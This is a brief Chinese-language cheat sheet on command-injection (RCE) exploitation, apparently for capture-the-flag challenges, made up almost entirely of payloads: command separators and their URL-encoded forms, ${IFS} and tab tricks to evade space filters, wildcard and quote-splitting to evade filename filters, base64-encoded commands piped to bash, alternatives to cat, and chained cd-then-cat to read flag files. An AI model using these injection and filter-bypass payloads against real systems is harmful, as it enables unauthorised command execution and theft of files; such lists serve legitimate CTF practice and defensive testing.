1. RCE 漏洞利用
1.1. 命令连接符
;|、||&、%26、&&、%26%26%0a
1.2. 空格过滤绕过
${IFS}、$IFS、$IFS$9<、>、<>%09:相当于Tab{,}:{cat,flag.php}
1.3. 文件名过滤绕过
??:cat flag??*:cat flag.*- 单引号、双引号:
cat fl""ag.p'h'p \:cat fl\ag.p\hp
1.4. base64 编码绕过
1
2
3
4
# cat flag.php ==base64==> Y2F0IGZsYWcucGhw
echo Y2F0IGZsYWcucGhw | base64 -d | bash
$(echo Y2F0IGZsYWcucGhw | base64 -d)
`echo Y2F0IGZsYWcucGhw | base64 -d`
1.5. cat 命令过滤绕过
tachead、tailmore、less
1.6. 目录分隔符过滤绕过
flag 在上级目录情况
多个命令执行:先 cd 到上级目录再 cat 内容
1
;cd flag_is_here;cat flag.txt
